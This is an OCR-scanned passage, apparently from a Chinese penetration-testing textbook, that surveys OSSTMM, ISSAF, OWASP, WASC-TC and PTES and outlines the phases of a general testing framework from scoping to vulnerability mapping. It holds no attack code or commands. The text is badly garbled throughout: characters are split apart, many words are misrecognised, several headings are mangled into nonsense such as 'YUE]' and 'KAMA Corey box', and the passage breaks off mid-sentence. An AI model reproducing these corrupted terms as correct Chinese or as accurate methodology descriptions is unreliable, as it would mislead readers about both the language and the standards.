合 目 标 网 络 和 应 用 环境 的 最 佳 测试 策略 ， 确 实 是 安全 审计 人 员 的 职 贡 。 

安全 测试 的 方法 论 有 很 多 。 要 选取 最 佳 的 指导 理论 ， 就 需要 综合 
虑 成 本 和 效果 的 因素 。 所 以 ， 评 佑 策略 的 旬 选 工作 受到 多 种 因 和 又 的 制 
约 。 这 些 因素 包括 与 目标 系统 有 关 的 技术 细节 和 各 种 资源 、 渗 透 人 员 的 
知识 结构 、 业 务 目 标 以 及 法 规 问题 。 以 业务 的 角度 看 ， 效 果 和 成 本 控制 














至 关 重 要 。 本 文 介 绍 的 这 几 种 方法 论 ， 在 官方 网 站 上 都 有 非常 正规 的 详 
细 说 明文 件 。 在 此 ， 我 们 对 它们 进行 简要 总 结 。 如 需 了 解 详细 的 工作 流 
程 ， 您 需要 杀 目 访问 相关 网 站 ， 仔 细 研 究 各 种 文件 和 实施 细则 。 


2.3.1 开源 安全 测试 方法 论 COSSTMMD 





开源 安全 测试 方法 论 COpen Source Security Testing Methodology 
Manual, OSSTMMO (官方 网 站 是 
http://www.isecom.org/research/osstmm.html) 是 由 Pete Herzog 创建 ， 继 
而 由 ISECOM 发 展 的 测试 方法 论 。 它 是 国际 公认 的 安全 测试 和 安全 分 析 


标准 。 很 多 企业 正在 他 们 的 日 常 评估 工作 中 应 用 这 一 标准 。 以 技术 的 角 
度 看 ， 这 一 方法 论 把 安全 评估 工作 划分 为 4 组 : YUE] (scope) 、 信 道 
(channel) 、 索 引 (index) 和 矢量 (vector) 。“ 范 围 * 指 代 评 佑 人员 收 
集 被 测 单 位 全 部 资产 相关 信息 的 工作 。“ 信 道 ” 则 是 这 些 资 产 之 间 的 通信 
方式 和 互动 类 型 ， 包括 物理 方式 、 光 学 方式 和 其 他 方式 的 通信 。 每 个 信 
道 都 构成 了 一 套 独 特 的 安全 组 件 ， 都 要 在 评估 阶段 进行 测试 和 验证 。 这 
些 组 件 包括 物理 安全 、 人 类 心理 学 、 数 据 网 络 、 无 线 通 信介 质 和 电信 设 
施 。 所 谓 “ 索 引 ”， 泛 指 特定 资产 和 相应 ID 的 对 应 关系 。 例 如 ， 审 计 人 员 
常常 要 明确 MAC 地 址 和 IP 地 址 的 对 应 天 系 ， 就 是 为 了 整理 一 种 索引 。 
而 “矢量 ” 指 的 是 审计 人 员 访 问 和 分 析 功 能 性 资产 的 方式 。 以 上 几 个 部 
分 ， 组 成 了 全 面 评 估 被 测 IT 运营 环境 的 整个 技术 流程 ， 被 称 为 审计 范畴 
Caudit scope) 。 

OSSTMIM 的 方法 论 总 结 了 多 种 形式 的 安全 测试 ， 并 将 它们 划分 为 6 
个 标准 种 类 。 

e Bil] (lind) : 事先 不 了 解 目 标 系统 的 任何 情况 的 测试 就 是 育 
测 。 然 而 ， 在 评估 过 程 开 始 之 前 ， 被 测 单位 会 知道 何 时 开始 安全 测试 。 
道德 黑客 (Ethical hacking) 和 对 抗 竞 赛 (War Gaming) 就 是 典型 的 盲 
测 。 因 为 育 测 遵循 了 道德 规范 ， 事 先 通知 被 测 单位 ， 所 以 这 种 测试 方法 
也 被 广泛 接受 。 

e 双 盲 测试 (double blind) : 在 双 盲 测试 中 ， 审 计 人 员 事 先 不 清楚 
目标 系统 的 情况 ， 被 测 单位 事先 也 不 会 知道 将 有 安全 测试 。 黑 盒 审计 和 
渗透 测试 都 属于 双 讶 测试 。 当 前 绝 大 多 数 的 安全 审计 采用 双 盲 测试 方 
法 。 对 于 审计 人 员 来 说 ， 选 择 能 够 胜任 的 最 佳 工 具 和 最 佳 技术 已 经 是 一 
种 考验 了 。 

e KAMA Corey box) : 在 灰 盒 测试 中 ， 审 计 师 仅 了 解 被 测 系统 
有 限 的 情况 ， 被 测 单位 也 会 知道 审计 开始 和 结束 的 时 间 。 脆 弱 性 评估 就 
属于 灰 盒 测试 。 











e 双 灰 盒 测试 (double grey box) : 双 灰 盒 测 试 工作 的 方式 类 似 于 
灰 盒 测试 。 只 不 过 在 双 灰 盒 测 试 中 ， 会 给 审计 人 员 定 义 一 个 时 限 ， 而 且 
这 种 测试 不 涉及 信道 测试 和 渗透 矢量 。 白 盒 审 计 就 属于 双 灰 盒 测试 。 

e 串联 测试 (tandem) : 在 串联 测试 中 ， 审 计 人 员 对 目标 系统 只 有 
最 低 限 度 的 了 解 ， 而 在 测试 开始 前 他 们 会 通告 被 测 单位 。 需 要 注意 的 
是 ， 串 联 测试 会 测试 得 比较 彻底 。 水 品 盒 测试 和 内 部 审计 都 是 串联 测试 
的 例子 。 

e WAJMAN (reversal) : 在 逆 回 测试 中 ， 审 计 员 充分 了 解 目标 系 
统 ; 而 被 测 单位 将 永远 不 会 知道 测试 的 时 间或 方式 。 

OSSTMM 推 广 的 技术 评估 框架 十 分 灵活 。 即 使 条 个 项 目 在 逻辑 上 
可 分 为 3 个 连续 的 信道 和 5 个 安全 组 件 ， 我 们 照样 可 以 使 用 OSSTMM 的 
框架 评估 其 安全 性 。OSSTMM 体 系 的 测试 方法 ， 通 过 检查 访问 控制 安 
全 、 流 程 安 全 、 数 据 控制 、 物 理 位 置 、 周 界 防护 、 安 全 意识 水 平 、 信 和 任 
关系 、 反 欺诈 控制 等 诸多 过 程 ， 全 面 评估 被 测 单 位 的 安全 性 。 总 体 而 
言 ， 这 一 理论 强调 测试 目标 和 测试 方法 ， 注 重 在 测试 前 、 测 试 中 、 测 试 
后 应 当 采 用 的 相应 集 略 ， 而 且 介 绍 了 解读 和 综合 分 析 测 试 结果 的 方法 。 
确切 掌握 目标 系统 当前 的 防护 水 平 至 关 重 要 ， 有 关 数 据 十 分 珍 贯 。 
OSSTMM 引入 了 RAV (Risk Assessment Value， 风 险 评 估 值 ) 的 概念 ， 
并 通过 它 曾 述 了 这 一 理论 的 很 多 理念 。RAV 的 基本 功能 是 分 析 测 试 结 
果 ， 进 而 基于 三 个 因素 (运营 安全 、 损 耗 控制 、 局 限 程 度 ) 的 标 称 值 来 
计算 安全 的 标 称 值 。 最 后 求 得 的 这 个 标 称 值 称 为 RAV 得 分 。 在 引入 
RAV 得 分 的 概念 之 后 ， 审 计 人 员 可 以 量化 评估 当前 的 安全 状态 ， 并 可 
为 企业 安全 的 下 一 步 目 标 设 定 里 程 碑 。 从 商业 的 角度 来 看 ，RAV EJ 
于 优化 安全 投资 ， 并 可 助 您 选择 更 为 有 效 的 安全 解决 方案 。 

主要 特性 与 优势 

OSSTMM 的 主要 特性 与 优势 如 下 。 

e OSSTMM 的 方法 可 从 本 质 上 降低 假 阴 性 和 假 阳性 的 发 生 率 。 它 

















推出 的 测量 方法 具有 普 过 的 应 用 价值 。 

e 该 架构 适用 于 多 种 类 型 的 安全 测试 ， 可 用 于 渗透 测试 、 日 爹 测试 
审计 、 漏 洞 评估 等 其 他 测试 。 

e 它 能 够 确保 每 次 评估 应 进行 得 全 面 彻底 ， 还 能 保证 评估 过 程 的 一 
致 性 、 可 测 性 、 可 靠 性 。 

e 该 方法 本 身 可 分 为 4 个 相对 独立 的 阶段 ， 即 定义 阶段 、 信 息 阶 
段 、 调 节 阶 段 和 控制 测试 阶段 。 每 一 个 阶段 都 会 获取 、 评 估 和 验证 目标 
环境 中 的 相关 信息 。 

e RAV 的 计算 方法 综合 衡量 了 运营 安全 、 损 耗 控 制 、 局 限 程 度 的 
情况 。 它 的 计算 结果 即 RAV 得 分 ， 可 代表 目标 系统 当前 的 安全 状况 。 

e 这 种 方法 的 评估 报告 均 采 用 安全 测试 审计 报告 (STAR，Security 
TestAudit Report) 模板 。 以 这 种 格式 书写 的 报告 同时 适合 被 测 单位 的 管 
理 层 和 技术 层 阅 读 ， 有 助 于 他 们 共同 理解 测试 目标 、 风 险 评 估 值 
(RAV) 和 每 个 阶段 的 测试 结 

e 该 方法 定期 更 新 。OSSTMM 会 符合 安全 测试 、 法 规 和 法 规 问题 
的 新 变化 。 

e OSSTMM 与 行业 法 规 、 企 业 政 策 ， 以 及 政府 法 规 兼 容 。 此 外 ， 
官方 认可 的 审计 员 都 是 直接 从 ISECOM (安全 与 开放 式 方法 论 研究 协 
会 ) 获取 的 资格 认证 。 








2.3.2 信息 


言 息 系 统 安 全 评估 框架 (Information Systems SecurityAssessment 
Framework, ISSAF)  Cwww.oissg. org/issaf) 是 另外 一 种 开放 源 代码 的 
安全 性 测试 和 安全 分 析 框 架 。 为 了 解决 安全 评估 工作 的 逻辑 顺序 问题 ， 
该 框架 已 分 为 若干 个 领域 (domain〉。 不 同 领域 评估 目标 系统 的 不 同 部 
分 ， 而 且 可 以 根据 实际 情况 对 每 个 领域 进行 相应 调整 。 把 这 一 架构 与 日 
第 业务 的 生命 周期 相 结 合 ， 可 以 充分 满足 企业 安全 测试 的 准确 性 、 完 整 





性 、 高 效 性 的 需求 。ISSAF 兼 顾 了 安全 测试 的 技术 方面 和 管理 方面 。 在 
技术 方面 ， 它 有 一 整套 关键 的 规则 和 程序 ， 形 成 了 一 套 完备 的 评估 程 
序 。 在 管理 方面 ， 它 明确 了 在 整个 测试 过 程 中 应 当 遵循 的 管理 要 则 和 最 
佳 实践 。 应 当 注 意 ，ISSAF 主 张 安全 评估 是 一 个 过 程 ， 而 不 是 一 次 审 
计 。 审 计 框 架 应 当 分 为 计划 、 评 估 、 修 复 、 评 审 以 及 维护 阶段 ， 应 当 有 
更 为 完善 的 标准 。 然 而 ISSAF 具 有 灵活 和 高 效 的 特点 ， 是 审计 工作 各 个 
阶段 的 通用 准则 ， 可 适用 于 所 有 企业 结构 。 

这 一 框架 的 交付 报告 分 为 业务 活动 、 安 全 措施 、 目 标 系 统 中 可 能 存 
在 的 安全 弱点 的 完整 清单 。 其 评估 过 程 注重 分 析 被 测 单位 最 容易 被 利用 
的 关键 漏洞 ， 侧 重 于 以 通过 最 短路 径 尽 快 完成 测试 任务 。 

ISSAF ”的 技术 评估 基准 十 分 全 面 ， 可 用 于 测试 各 种 技术 和 不 同 流 
程 。 不 过 ， 丰 寅 的 内 容 带 来 了 一 大 副作用 ， 即 要 跟 上 评估 领域 的 技术 变 
化 速度 ， 这 一 框架 就 需要 频繁 更 新 。 相 对 而 言 ，OSSTMM 受 技术 更 新 
影响 的 幅度 略 小 。 即 使 审计 人 员 使 用 不 同 的 工具 和 全 新 的 技术 ， 他 们 遵 
循 的 方法 论 却 基本 不 变 。 虽 然 如 此 ， 但 是 ISSAF 仍 然 号 称 是 由 最 新 的 安 
全 工具 、 最 佳 实践 ， 以 及 补充 安全 评估 计划 的 管理 理念 所 组 成 的 广泛 框 
架 。 它 也 可 以 和 OSSTMM 或 其 他 测试 方法 论 一 起 使 用 ， 从 而 能 够 兼 有 
各 种 方法 的 优点 。 

主要 特性 与 优势 

ISSAF 的 主要 特性 与 优势 如 下 。 

e ISSAF 主要 测试 当前 安全 控制 措施 中 的 严重 漏洞 ， 所 以 它 在 保障 
系统 安全 方面 的 意义 重大 。 

e 它 关 注 信息 安全 范畴 内 的 各 个 关键 领域 ， 涵 盖 了 风险 评估 、 业 务 
结构 和 管理 、 控 制 评 估 、 服 务 管 理 、 安 全 策略 的 开发 和 常规 的 最 佳 实 
践 。 

e ISSAF 渗透 测试 方法 论 评估 网 络 、 系 统 或 应 用 程序 的 安全 性 。 应 
用 该 框架 可 以 无 阻碍 地 把 精力 重点 放 在 特定 技术 上 ， 如 路 由 器 、 交 换 




















机 、 防 火 墙 、 入 侵 检 测 和 防御 系统 、 存 储 区 域 网 络 、 虚 拟 专用 网 络 、 各 
种 操作 系统 、Web 应 用 服务 器 、 数 据 库 等 。 

e 通过 必要 的 控制 和 处 理 ， 它 可 以 统一 技术 层 和 管理 层 这 两 方面 人 
员 对 安全 测试 的 理解 。 

e 它 可 帮助 管理 人 员 理 解 当 前 边界 防御 体系 的 现 有 风险 ， 并 可 指出 
可 能 影响 业务 完整 性 的 安全 弱点 ， 从 而 帮助 人 们 主动 地 减少 风险 。 

可 同时 结合 OSSTMM 和 ISSAF 两 种 理论 评估 企业 环境 的 安全 状况 。 


2.3.3 开放 式 Web 应 用 程序 安全 项 


开放 式 ”Web 应 用 程序 安全 项 目 (Open Web Application Security 
Project, OWASP) 定期 推出 其 top 10 project C 排名 前 十 位 的 安全 隐患 防 
护 守 则 ) 以 提高 公共 对 应 用 安全 的 认 知 意识 。 这 个 项 目 公开 了 编写 安全 
程序 押 需 遵循 的 各 种 原则 和 惯例 。OWASP 的 测试 项 目 
(https://www.owasp.org/index.php/owasp- Testing_Project) 公布 了 一 套 
非常 实用 的 安全 测试 指南 。 您 应 当 仔 细 阅 读 这 部 分 内 容 ， 因 为 这 个 测试 
框架 往往 可 以 指导 您 的 工作 。 

OWASP 的 Top 10 Project 总 结 了 各 种 攻击 矢量 ， 按 照 各 种 隐患 可 能 
在 技术 上 和 业务 上 造成 的 危害 ， 对 影响 应 用 安全 的 风险 进行 分 类 和 排 
名 。 在 评估 应 用 程序 安全 时 ， 这 些 排名 前 十 的 安全 风险 揭露 了 普遍 存在 
于 各 种 技术 和 平台 的 通用 攻击 方法 。 它 还 前 述 了 测试 、 验 证 和 修补 应 用 
程序 安全 弱点 的 具体 方法 。 尽 管 Top 10 Project 揭 示 了 安全 领域 的 高 风险 
问题 ， 但 是 这 10 种 风险 也 只 是 Web 应 用 程序 安全 性 问题 的 一 部 分 而 已 。 
尽管 如 此 ，OWASP 社 区 的 很 多 指南 仍然 可 以 指导 开发 人 员 和 安全 审计 
人 员 有 效 地 管理 Web 应 用 程序 的 安全 。 

e 测试 指南 : https://www.owasp.org/index.php/OWASP Testing- 
Guide v3. Table of Content. 














e 开发 人 员 指 南 : https//www.owasp.org/index.php/Guide. 


e. 代码 审查 指南 : https://www.owasp.org/index.php/Category: 
OWASP_Code_Review_Project. 

OWASP 的 Top 10 Project 每 年 都 会 更 新 。 如 需 获 取 详 细 信 息 ， 请 访 
问 这 个 项 目的 官方 网 站 
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project. 

主要 特性 与 优势 

OWASP 的 主要 特性 与 优势 如 下 。 

e OWASP 推出 了 Web 应 用 程序 的 十 大 安全 风险 的 测试 方法 。 应 用 
这 些 方 法 ， 可 使 应 用 程序 避免 出 现 常见 的 安全 缺陷 ， 免 受 常见 攻击 的 危 
害 ， 进 而 巩固 了 应 用 程序 的 保密 性 、 完 整 性 和 可 用 性 。 

e OWASP 社区 研发 出 大 量 安全 工具 ， 这 些 工 具 可 辅助 进行 自动 或 
手动 的 Web 应 用 程序 测试 。Kali Linux 收录 了 其 中 较为 著名 的 程序 ， 如 
WebScarab、Wapiti、JBroFuzz 和 SQLiX 等 。 

e 在 网 络 基 础 设施 的 安全 评估 方面 ，OWASP 测试 指南 为 您 提供 了 
特定 技术 的 评估 细则 。 举 例 来 资 ， 它 的 甲骨 文 〈《Oracle) 的 测试 方法 与 
MySQL 的 测试 方法 就 各 有 针对 性 。 该 指南 采用 多 种 相互 关联 的 方法 评 
估 各 种 技术 ， 有 助 于 审计 人 员 因 地 制 宜 地 制定 测试 方法 。 

© 它 鼓 励 研发 人 员 在 研发 周期 的 每 个 阶段 进行 有 计划 的 安全 测试 。 
这 能 提高 应 用 程序 的 健全 性 、 安 全 性 ， 并 能 减少 程序 中 的 错误 。 

e 它 在 业内 的 认可 度 和 知名 上 度 屈指 可 数 。 大 把 排名 前 十 位 的 安全 隐 
患 防护 守则 与 其 他 Web 应 用 程序 安全 评估 标准 结合 使 用 ， 您 可 同时 满足 
一 个 以 上 的 安全 标准 。 























只 有 彻底 、 严 格 的 测试 流程 ， 才 能 发 现 应 用 程序 的 安全 隐患 ， 而 这 
些 测试 流程 完全 可 以 纳入 软件 的 开发 生命 周期 。Web 应 用 安全 联合 威胁 


分 类 (Web Application Security Consortium Threat Classification, 


WASC-TC) 是 这 样 的 一 个 评估 web 应 用 程序 安全 性 的 开放 标准 。 与 
OWASP 标 准 相 似 ， 它 也 从 攻击 和 弱点 两 方面 讨论 安全 问题 ， 但 这 一 标 
准 以 更 为 深入 的 方式 解决 安全 隐患 。 要 识别 、 验 证 应 用 程序 所 面临 的 各 
种 威胁 ， 就 要 遵循 标准 化 的 工作 流程 。WASC-TC 可 以 迅速 适用 于 各 种 
技术 环境 ， 有 着 显著 的 易 用 性 。 整 体 上 说 ， 它 能 够 帮助 开发 人 员 和 安全 
审计 人 员 以 不 同 的 视图 了 解 Web 应 用 程序 面临 的 安全 威胁 。 

e 枚 举 视图 : 枚 举 视图 是 分 析 Web 应 用 程序 攻击 手段 和 相应 安全 弱 
点 的 基础 。 它 从 定义 、 类 型 和 多 种 编程 平台 的 实例 这 几 个 角度 ， 详 细 讨 
论 了 每 种 攻击 手段 和 每 个 安全 弱点 。 另 外 ， 所 涉及 的 安全 弱点 和 攻击 手 
段 都 被 分 配 了 唯一 的 识别 编号 ， 以 便于 人 们 引用 。 目 前 ， 这 个 视图 里 总 
共有 49 个 WASC-ID 号 码 (1—49) 。 这 些 编号 并 不 代表 相应 条 目的 危害 
程度 ， 仅 仅 是 为 了 方便 引用 而 分 配 的 编号 。 

e 开发 视图 : 开发 视图 关联 分 析 外 部 的 攻击 和 程序 内 部 的 安全 弱 
点 ， 将 开发 人 员 的 视野 转 回 程序 自身 的 漏洞 。 这 一 分 析 适 用 于 开发 周期 
的 三 个 阶段 ， 即 设计 、 实 现 (编程 ，》、 部 署 阶段 。 如 果 在 明确 应 用 程序 
的 需求 时 没有 充分 考虑 安全 方面 要 求 ， 就 会 在 研发 周期 的 初期 阶段 引发 
漏洞 ， 形 成 设计 阶段 的 安全 弱点 。 不 安全 的 编程 规则 或 不 当 的 惯例 产生 
会 造成 实现 阶段 的 安全 弱点 。 无 论 在 应 用 程序 、Web 服务 器 或 是 其 他 外 
部 系统 的 配置 过 程 中 哪个 部 分 出 现 差错 ， 最 终 都 会 导致 部 属 阶段 的 安全 
弱点 。 可 见 ， 这 个 视图 以 最 佳 安全 实践 为 蓝本 ， 提 出 了 将 安全 保障 措施 
融入 到 日 常 的 研发 生命 周期 的 具体 方法 。 

e 交叉 引用 视图 : 这 个 视图 关联 地 分 析 了 多 种 Web 应 用 安全 标准 。 
通过 对 该 视图 的 引用 ， 审 计 人 员 和 开发 团队 能 够 把 当前 所 使 用 的 标准 中 
的 术语 (标准 条 球 ) 与 其 他 标准 的 相应 内 容 进 行 对 照 分 析 。 如 此 一 来 ， 
只 需要 较 少 的 开销 ， 就 可 以 让 一 个 项 目 同 时 符合 多 种 不 同 的 安全 标准 。 
因为 不 同 的 应 用 程序 安全 标准 会 从 不 同 的 角度 评 佑 应 用 程序 的 安全 性 ， 
所 以 它们 衡量 同一 的 风险 的 评估 指标 也 不 尽 相 同 。 因 此 ， 要 对 不 同安 全 























标准 进行 差异 性 分 析 ， 才 能 够 正确 地 计算 安全 风险 及 其 严重 程度 。 当 前 
WASC-TC 中 的 攻击 方法 和 薄弱 环节 ， 可 以 映射 到 OWASP 的 Top 10 
Project、Mitre 通 用 缺陷 列表 (Common Weakness Enumeration， 
CWE) . Mitre ”通用 攻击 模式 列表 和 分 类 (Common Attack Pattern 
Enumeration and Classification，CAPEC) 、SANS-CWE 排名 前 25 的 软 
件 高 危 错误 列表 (SANS-CWE Top 25 list) 。 

Mitre's CWE 的 官方 网 站 是 https://cwe.mitre.org/。 

Mitre's CAPEC 的 官方 网 站 是 http://capec.mitre.org/。 

SANS-CWE 的 排名 前 25 的 软件 高 危 错误 列表 的 发 布 网 站 是 


http://www.sans.org/top25-software-errors/ o 





如 需 详细 了 解 ^^ WASC-IC 及 其 评论 ， 请 访问 官方 网 站 
http://projects.webappsec.org/Threat-Classification 。 
主要 特性 与 优势 


WASC 一 TC 的 主要 特性 与 优势 如 下 。 

e WASC 一 TC 围绕 常见 攻击 和 常规 弱点 这 一 中 心 ， 深 入 讨论 了 
Web 应 用 程序 运营 系统 的 安全 评估 方法 。 

e 无 论 何 种 web 应 用 程序 平台 ， 都 可 使 用 Kali Linux 的 工具 集 验 
证 、 测 试 WASC 一 TC 提出 的 常见 攻击 和 常规 弱点 。 

e ” 它 提出 了 三 种 不 同 视图 ， 即 枚 举 视图 、 开 发 视图 和 交叉 引用 视 
图 。 枚 举 视图 起 到 了 基础 数据 库 的 作用 ， 它 列举 了 在 Web 应 用 中 所 有 
可 能 被 发 现 的 攻击 方法 和 安全 弱点 。 开 发 视图 将 这 些 攻击 方法 和 安全 弱 
点 进行 天 联 分 析 ， 整 理 成 一 系列 漏洞 ， 并 根据 它们 在 开发 过 程 中 的 出 现 
阶段 进行 分 类 。 而 开发 阶段 又 可 分 为 设计 阶段 、 实 现 阶段 和 部 署 阶段 。 
WASC-TC 标准 的 交叉 引用 视图 用 于 对 照 、 引 用 其 他 的 应 用 程序 安全 标 
ee 











e WASC-TC 标准 已 经 得 到 了 业界 的 广泛 认可 。 在 许多 开源 和 商业 
解决 方案 里 ， 特 别 是 漏洞 评估 和 管控 产品 中 ， 都 能 看 到 WASC-TC 的 身 
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e WASC-TC 也 可 以 和 其 他 著名 的 应 用 安全 标准 兼容 ， 例 如 OWASP 
和 SANS-CWE。 





渗透 测试 执行 标准 (Penetration Testing Execution Standard, 
PTES) 的 先驱 都 是 渗透 测试 行业 的 精英 。 这 个 标准 由 渗透 测试 7 个 阶段 
的 标准 组 成 ， 可 在 任意 环境 中 进行 富有 成 果 的 渗透 测试 。 它 的 官方 网 站 
详细 介绍 了 具体 测试 方法 ， 有 兴趣 的 读者 可 访问 http://www. pentest- 
standard.org/index.php/Main_Page. 

根据 这 一 标准 ， 标 准 的 渗透 测试 可 以 分 为 下 述 7 个 阶段 : 

e 事前 互动 ; 

e 情报 收集 ; 

e 威胁 建 模 ; 

e 漏洞 分 析 ; 

e 漏洞 利用 ; 

e 深度 利用 ; 

e 书面 报告 。 

PTES 的 官方 网 站 详细 介绍 了 每 个 阶段 的 思维 导 图 (mind maps) 和 
组 成 步骤 。 这 些 内 容 有 助 于 审计 人 员 根 据 被 测 环境 的 测试 要 求 ， 对 
PTES 标 准 进行 相应 调整 。 只 要 在 其 官方 网 站 上 点 击 思维 导 图 的 构成 节 
点 ， 就 可 详细 得 看 该 节点 的 各 个 组 成 步 又。 

主要 特性 与 优势 

PTES 的 主要 特性 与 优势 如 下 。 

e 它 是 非常 全 面 的 渗透 测试 框架 ， 涵 新 了 渗透 测试 的 技术 方面 和 其 
他 重要 的 方面 ， 如 范围 葛 延 (scope creep) 、 报 告 ， 以 及 渗透 测试 人 员 


保护 自身 的 方法 。 

e 它 介绍 了 多 数 测 试 任务 的 具体 方法 ， 可 指导 您 准确 测试 目标 系统 
的 安全 状态 。 

o 它 汇 聚 了 多 名 日 行 一 “ 渗 ” 的 渗透 测试 专家 的 丰富 经 验 。 

e 它 包 含 了 最 常用 的 以 及 很 罕见 的 相关 技术 。 

e 人 它 浅 显 易 懂 ， 您 可 根据 测试 工作 的 需要 对 相应 测试 步骤 进行 调 


2.5 通用 渗透 测试 框架 


Kali Linux 属于 通用 型 操作 系统 ， 它 配备 有 多 种 安全 评估 工具 和 渗 
透 测 试 工 具 。 在 没有 合适 的 测试 理论 指导 的 情况 下 冒 然 使 用 这 些 工具 ， 
可 能 会 导致 测试 失败 ， 测 试 结果 可 能 无 法 让 人 满意 。 因 此 ， 从 技术 管理 
的 角度 来 看 ， 遵 循 正规 的 测试 框架 对 安全 测试 极为 重要 。 

这 一 小 节 将 通过 黑 盒 测 试 的 具体 方法 和 白 盒 测试 的 通用 测试 方法 介 
绍 通 用 测试 框架 。 它 涵盖 了 典型 的 审计 测试 工作 和 渗透 测试 工作 会 涉及 
到 的 各 个 阶段 。 评 估 人 员 可 以 根据 被 测 目标 的 具体 情况 对 上 述 测试 方法 
进行 相应 调整 。 这 一 方法 论 由 一 系列 相关 步骤 所 组 成 。 要 想 成 功 完成 安 
全 评估 项 目 ， 必 须 在 测试 的 初始 化 阶段 、 测 试 进行 阶段 以 及 测试 结束 阶 
段 全 面 遵 循 这 些 步骤 。 这 些 步骤 包括 : 

e i5 FRE ; 

e 信息 收集 ; 

e 目标 识别 ; 

e 服务 枚 举 ; 

e 漏洞 映射 ; 

o 社会 工程 学 ; 


e 漏洞 利用 ; 





e 提升 权限 ; 

e 访问 维护 ; 

e 文档 报告 。 

无 论 是 进行 白 盒 测试 还 是 黑 盒 测试 ， 选 择 和 使 用 测试 步骤 都 是 测试 
人 员 的 责任。 在 测试 开始 前 ， 测 试 人 员 需 要 根据 目标 系统 的 实际 环境 和 
己 掌 握 的 关于 目标 系统 的 情况 ， 制 定 最 佳 的 测试 策略 。 下 文 将 会 介绍 每 
一 个 测试 阶段 ， 包 括 它 们 的 简要 描述 、 定 义 和 可 能 适用 的 应 用 程序 。 虽 
然 这 种 通用 测试 方法 论 可 以 配合 其 他 的 方法 论 同时 使 用 ， 但 是 它 只 是 一 
种 指导 建议 ， 而 不 是 全 能 的 渗透 测试 解决 方案 。 








在 开始 技术 性 安全 评估 之 前 ， 务 必要 观察 、 研 究 目标 环境 的 被 测 范 
围 。 同 时 还 要 了 解 ， 这 个 范围 牵扯 到 多 少 个 单位 ， 是 单个 单位 还 是 多 个 
单位 会 参与 到 安全 评估 的 工作 中 来 。 在 范围 界定 阶段 ， 需 要 考虑 的 典型 
因素 如 下 。 

e 测试 对 象 是 什么 ? 

e 应 当 采 取 何 种 测试 方法 ? 

e 有 哪些 在 测试 过 程 中 需要 满足 的 条 件 ? 

e 哪些 因素 可 能 会 限制 测试 执行 的 过 程 ? 

e 需要 多 久 才能 完成 测试 ? 

e 此 次 测试 应 当 达 成 什么 任务 目标 ? 

审计 人 员 只 有 确切 理解 被 评估 系统 所 使 用 的 技术 ， 理 解 其 基本 功 
能 ， 以 及 相关 技术 与 网 络 之 间 的 相互 影响 ， 才 能 成 功 达 成 渗透 测试 的 目 
标 。 因 此 ， 无 论 是 进行 什么 类 型 的 安全 评估 项 目 ， 审 计 人 员 的 知识 结构 
都 将 起 着 至 关 重 要 的 作用 。 

















2.5.2 全息 收集 


在 划 定 了 测试 范围 之 后 ， 就 需要 进入 信息 收集 阶段 。 在 这 个 阶段 ， 
渗透 测试 人 员 需 要 使 用 各 种 公开 资源 尽 可 能 地 获取 测试 目标 的 相关 信 
息 。 他 们 从 互联 网 上 搜集 信息 的 互联 网 渠道 主要 有 : 

e 论坛 ; 

e 公告 板 ; 

e 新 闻 组 ; 

e 媒体 文章 ; 

e 博客 ; 

e 社交 网 络 ; 

e 其 他 商业 或 非 商 业 性 的 网 站 。 

此 外 ， 他 们 也 可 借助 各 种 搜索 引擎 中 获取 相关 数据 ， 例 如 谷歌 、 雅 
席 、MSN 必 应 、 百 度 每。 进一步 说 ， 审 计 人 员 可 以 使 用 Kali Linux 收录 
的 各 种 工具 在 测试 目标 的 网 络 系统 里 挖掘 信息 。 这 些 运用 漏洞 数据 挖掘 
技术 的 工具 能 够 收集 可 观 信 息 ， 包 括 DNS 服 务 器 、 路 由 关系 、whois 数 
据 库 、 电 子 邮件 地 址 、 电 话 号 码 、 个 人 信息 以 及 用 户 账户 。 收 集 到 的 信 
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这 个 阶段 的 主要 任务 是 识别 目标 的 网 络 状 态 、 操 作 系 统 和 网 络 架 
构 。 该 阶段 工作 旨 在 完整 地 展现 目标 网 络 里 各 种 联网 设备 或 技术 的 完整 
关系 ， 以 帮助 测试 人 员 在 接 下 来 的 工作 里 枚 举目 标 网 络 的 各 种 服务 。 
Kali Linux 提供 的 一 系列 先进 的 网 络 工具 ， 可 以 轻松 探测 到 联网 主机 ， 
识别 这 些 主机 运行 的 操作 系统 ， 并 根据 每 个 设备 在 网 络 系统 中 的 不 同 角 
色 对 它们 进行 归 类 。 这 些 工 具 通 第 采用 了 基于 上 层 网 络 协议 的 主动 和 被 
动 的 检测 技术 。 它 们 能 够 通过 不 同 的 方式 巧妙 地 利用 各 种 协议 获取 许多 
有 用 的 信息 ， 比 如 操作 系统 指纹 等 。 


2.5.4 服务 枚 举 

















一 阶段 会 根据 前 面 各 个 阶段 的 成 果 ， 进 一 步 找 出 目标 系统 中 所 有 
开放 的 端口 。 一 旦 找到 了 所 有 开放 的 端口 ， 就 可 以 通过 这 些 端口 来 列 出 
目标 系统 上 运行 的 服务 。 有 很 多 扫 摘 端口 的 技术 ， 如 全 开 〈full-open ) 
扫描 、 半 开 Chalf-open) 扫描 、 隐 蔽 式 〈stealth) 扫描 等 。 这 些 技术 都 
可 用 来 检测 端口 的 开放 情况 ， 甚 至 可 以 扫描 处 于 防火 墙 或 者 入 侵 检 测 系 
统 保护 下 的 主机 。 主 机 上 开放 的 端口 都 有 相应 的 服务 程序 ， 对 这 些 信 息 
进行 深度 分 析 之 后 ， 可 进一步 发 掘 目标 网 络 基础 设施 中 可 能 存在 的 漏 
洞 。 因 此 ， 这 个 阶段 为 其 后 的 测试 工作 打下 了 基础 ， 有 助 于 测试 人 员 继 
而 发 现 各 种 网 络 设 备 上 可 能 会 造成 严重 危害 的 安全 漏洞 。Kali Linux 收 
录 的 部 分 自动 化 工具 可 以 辅助 审计 人 员 完 成 这 一 阶段 的 目标 。 











至 此 为 止 ， 我们 已 经 充分 收集 了 目标 网 络 的 各 种 信息 。 接 下 来 ， 我 
们 就 可 以 根据 已 经 发 现 的 开放 端口 和 服务 程序 ， 碍 找 、 分 析 目 标 系 统 中 
存在 的 漏洞 。Kali Linux 系统 中 提供 的 一 系列 目 动 化 的 网 络 和 应 用 漏洞 
评估 工具 可 以 担任 完成 这 个 阶段 的 任务 。 当 然 ， 人 工 〈 手 动 ) 完成 这 些 
任务 未 尝 不 可 ， 只 是 人 工 操 作 极 为 耗 时 ， 而 且 需 要 有 关 人 员 拥 有 专家 级 
的 知识 。 但 是 ， 如 果 能 够 将 自动 和 手动 这 两 种 不 同 的 测试 方法 结合 起 
